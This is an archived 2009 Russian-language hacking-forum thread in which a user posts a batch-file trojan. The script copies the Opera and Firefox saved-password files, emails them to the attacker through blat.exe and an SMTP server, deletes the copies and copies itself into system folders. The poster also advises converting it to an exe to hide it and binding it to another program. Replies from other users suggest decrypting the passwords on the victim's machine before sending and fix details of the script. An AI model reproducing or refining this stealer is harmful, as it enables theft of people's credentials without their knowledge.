ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > Реверсинг
Перезагрузить страницу Крадем= все пароли юзера!
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Крадем= все пароли юзера!
  #1  
Старый 25.08.2009, 01:26
Voland-791
Познающий
Регистрация: 01.05.2009
Сообщений: 40
Провел на форуме:
333392

Репутация: 3
По умолчанию Крадем= все пароли юзера!
Недавно мне пришла мысль почему бы не написать маленький троян (батник) отсылающий чужие пароли на указаный ящик! Крадет файл Wand.bat в нем лежат пароли оперы и signons3.txt от Mozilla Firefox. используем прогу Blat.exe скачать её можно с www.blat.ru
вот его тело:

%SYSTEMROOT%/system32/blat.exe -install -server smtp.mail.ru -port 25 -f e-mail@mail.ru -u e-mail -pw PASS >nul
cd %APPDATA%\Opera\Opera\profile\ >nul
copy wand.dat C:\wand.rar >nul
chcp 1251
blat.exe -subject "hacK" -body "Урожай собран!" -to e-mail@mail.ru -attach c:\wand.rar >nul
cd c:\
erase wand.rar >nul
cd %APPDATA%\Mozilla\Firefox\Profiles\9vf96daw.defaul t\ >nul
copy signons3.txt C:\signons3.rar >nul
blat.exe -subject "hacK" -body "Урожай собран!!" -to -е-mail@mail.ru -attach c:\signons3.rar >nul
cls >nul
cd c:\
erase signons3.rar
copy %0 %systemroot%\amatory_crack.bat
copy %0 %systemroot%\system32\amatory_crack.bat

Необходимые файлы для правильной работы:
blat.exe
blat.lib
blat.dll
Наш батник

Используем прогу Bat_To_Exe_Converter для шифрования и скрытия!скачать её можно сдесь http://www.x2b.ru/get/60772 ну вот троян почти готов осталось склеить скакой нибудь прогой!
 
Ответить с цитированием

  #2  
Старый 25.08.2009, 04:55
ProTeuS
HARDstasy
Регистрация: 26.11.2004
Сообщений: 1,367
Провел на форуме:
4226592

Репутация: 2175


Отправить сообщение для ProTeuS с помощью ICQ
По умолчанию
к разделу реверсинга сабж никоим образом не связан, советую не слать тупо файлы а декриптить на клиенте и слать уже расшифрованые данные:
http://forum.antichat.ru/showthread.php?p=1470090
http://www.rus.passcape.com/opera_password_recovery_screenshots.htm
 
Ответить с цитированием

  #3  
Старый 25.08.2009, 05:04
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
signons3.txt от Mozilla Firefox

А файл уже без базы key3.db расшифровывается?
И почему signons3.txt ? Есть ещё и signons2.txt да и signons4.txt видели
 
Ответить с цитированием

  #4  
Старый 25.08.2009, 08:51
0rs
Познающий
Регистрация: 30.12.2008
Сообщений: 64
Провел на форуме:
647156

Репутация: 76
Отправить сообщение для 0rs с помощью ICQ
По умолчанию
blat.lib и blat.dll не нужны.
 
Ответить с цитированием

  #5  
Старый 25.08.2009, 15:43
neprovad
Постоянный
Регистрация: 19.10.2007
Сообщений: 794
Провел на форуме:
1013791

Репутация: 711


По умолчанию
Код:
cd %APPDATA%\Mozilla\Firefox\Profiles\9vf96daw.defaul t\ >nul
кривой выбор, папка с профилем не всегда начинается с "9vf96daw" этот набор случайный, уже не универсально!
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Халявный интернет или как спрятаться надежнее чем VPN или SSH с цепочкой соксов. kodzero Статьи 16 16.11.2009 20:23
Active Directory, хороший мануал. Cthulchu Windows системы 8 15.01.2009 16:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ